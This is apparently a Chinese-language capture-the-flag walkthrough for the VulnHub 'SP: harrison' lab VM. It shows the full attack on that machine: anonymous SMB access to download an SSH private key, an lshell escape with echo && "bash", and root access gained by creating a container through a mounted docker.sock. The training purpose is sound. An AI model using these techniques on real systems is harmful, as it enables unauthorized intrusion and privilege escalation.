Harrison
作者:jason huawen
靶机信息
名称: SP: harrison
地址:
https://www.vulnhub.com/entry/sp-harrison,302/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:19:b1:e6 1 60 PCS Systemtechnik GmbH
192.168.56.125 08:00:27:a8:46:b3 1 60 PCS Systemtechnik GmbH
利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.125 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 19:19 EDT
Nmap scan report for bogon (192.168.56.125)
Host is up (0.000094s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5b87f1fe678fa6ba8b753c11343db6b8 (RSA)
| 256 93877e2e5e4ece7156a11c6bfc1f6e55 (ECDSA)
|_ 256 c014c024e8a87ed4cda64225f3484794 (ED25519)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:A8:46:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2023-04-23T07:19:44
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: harrison
| NetBIOS computer name: HARRISON\x00
| Domain name: \x00
| FQDN: harrison
|_ System time: 2023-04-23T07:19:45+00:00
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ smbclient -L 192.168.56.125
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Private Disk
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.125 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ smbclient //192.168.56.125/Private
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322884 blocks available
smb: \> get flag.txt
getting file \flag.txt of size 32 as flag.txt (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
smb: \> cd .ssh
smb: \.ssh\> ls
. D 0 Thu Apr 18 12:42:57 2019
.. D 0 Thu Apr 18 12:55:51 2019
authorized_keys N 399 Thu Apr 18 12:42:57 2019
id_rsa A 1679 Thu Apr 18 12:14:17 2019
id_rsa.pub A 399 Thu Apr 18 12:14:17 2019
32894736 blocks of size 1024. 27322884 blocks available
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (546.5 KiloBytes/sec) (average 334.2 KiloBytes/sec)
smb: \.ssh\> get id_rsa.pub
getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (194.8 KiloBytes/sec) (average 294.4 KiloBytes/sec)
smb: \.ssh\> get authorized_keys
getting file \.ssh\authorized_keys of size 399 as authorized_keys (129.9 KiloBytes/sec) (average 245.0 KiloBytes/sec)
smb: \.ssh\> cd ..
smb: \> cd silly_cats\
smb: \silly_cats\> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:55:51 2019
cat3.jpg N 38624 Mon Jan 8 13:30:10 2018
cat1.jpg N 73946 Mon Jan 8 13:29:40 2018
cat2.jpg N 74130 Mon Jan 8 13:29:32 2018
32894736 blocks of size 1024. 27322884 blocks available
smb: \silly_cats\> get cat1.jpg
getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (24070.2 KiloBytes/sec) (average 5743.3 KiloBytes/sec)
smb: \silly_cats\> get cat2.jpg
getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (24130.1 KiloBytes/sec) (average 9191.0 KiloBytes/sec)
smb: \silly_cats\> get cat3.jpg
getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (18858.5 KiloBytes/sec) (average 10265.2 KiloBytes/sec)
smb: \silly_cats\> quit
─(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ enum4linux 192.168.56.125
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\harrison (Local User)
enum4linux识别出用户名harrison
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ cat flag.txt
It's not going to be that easy.
没那么容易?
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.125
The authenticity of host '192.168.56.125 (192.168.56.125)' can't be established.
ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.125' (ED25519) to the list of known hosts.
Welcome to Harrison. Enjoy your shell.
Type '?' or 'help' to get the list of allowed commands
harrison:~$ id
*** forbidden command: id
harrison:~$
虽然得到了shell,但是这是受限的shell
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.125 -t /bin/sh
*** forbidden shell escape: "/bin/sh"
This incident has been reported.
Connection to 192.168.56.125 closed.
用-t选项指定不同的shell没能逃脱受限的Shell
harrison:~$ echo $SHELL
*** forbidden path: /usr/bin/lshell
可知为lshell
harrison:~$ echo && "bash"
harrison@harrison:~$ ls -alh
total 44K
drwxr-xr-x 1 harrison harrison 4.0K Apr 23 07:31 .
drwxr-xr-x 1 root root 4.0K Apr 18 2019 ..
-rw-r--r-- 1 harrison harrison 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 harrison harrison 3.7K Apr 4 2018 .bashrc
drwx------ 2 harrison harrison 4.0K Apr 23 07:24 .cache
-rw------- 1 harrison harrison 272 Apr 23 07:31 .lhistory
-rw-r--r-- 1 harrison harrison 807 Apr 4 2018 .profile
drwxr-xr-x 1 harrison harrison 4.0K Apr 18 2019 .ssh
-rw-r--r-- 1 root root 32 Apr 18 2019 flag.txt
drwxr-xr-x 2 root root 4.0K Apr 18 2019 silly_cats
harrison@harrison:~$ cd /home
harrison@harrison:/home$ ls
harrison
harrison@harrison:/home$
用echo && "bash"逃逸,成为正常的shell
harrison@harrison:/root$ ls -alh
total 20K
drwxr-xr-x 1 root root 4.0K Apr 18 2019 .
drwxr-xr-x 1 root root 4.0K Apr 23 07:16 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr--r-- 1 root root 49 Apr 18 2019 flag.txt
harrison@harrison:/root$ cat flag.txt
Nope. No flags here. Where do you think you are?
提权
提权是通过docker实现的,但是过程太复杂了,是参考其他人的做法才能完成。
查看现有的容器
harrison@harrison:~$ cd /tmp
harrison@harrison:/tmp$ curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
[{"Id":"902f9eaf084a2da13ce02a097e80c39686c73c6af1ffcc78602c83dde49ae534","Names":["/nervous_proskuriakova"],"Image":"cont1:v1","ImageID":"sha256:6275c2bd4f72c6c417458fa6caecf2bc23bf823298650334c3c3bd42579aa95f","Command":"/bin/sh -c '/etc/init.d/smbd start && /etc/init.d/ssh start && bash' /bin/bash","Created":1682237761,"Ports":[{"IP":"0.0.0.0","PrivatePort":22,"PublicPort":22,"Type":"tcp"},{"IP":"0.0.0.0","PrivatePort":445,"PublicPort":445,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 56 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"a81871ff28475882e034ea03bb1aab0b2ba4d0d1271312250f1db62337acc2b0","EndpointID":"01e3e3658c213f253bd4d957175f1007e23e6e4c2d9268e14d80a36512d531fb","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]
创建新容器:
harrison@harrison:/tmp$ echo -e '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}' > container.json
查看新创建的容器:
harrison@harrison:/tmp$ curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
{"Id":"ea0a8e5839ab3e2817b02fb086a63a776f06afcd5a4f742eb5d8a898aae3719f","Warnings":null}
启动新容器:
harrison@harrison:/tmp$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ea0a/start
连接新创建的容器:
harrison@harrison:/tmp$ nc -U /var/run/docker.sock
POST /containers/34b3/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 404 Not Found
Content-Type: application/vnd.docker.raw-stream
No such container: 34b3
harrison@harrison:/tmp$ nc -U /var/run/docker.sock
POST /containers/ea0a/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp
ls
]bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
os_root
proc
root
run
sbin
srv
sys
tmp
usr
var
cd os_root
ls -alh
�total 32K
drwx------ 3 root root 4.0K Apr 18 2019 .
drwxr-xr-x 1 root root 4.0K Apr 23 08:18 ..
-rw------- 1 root root 289 Apr 18 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 16 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Apr 18 2019 .selected_editor
-rwx------ 1 root root 73 Apr 18 2019 flag.txt
cat flag.txt
IDo you think you are out?
Just kidding, here is your flag: 1xcDF933mce
注意这里所有的命令都需要保持容器ID一致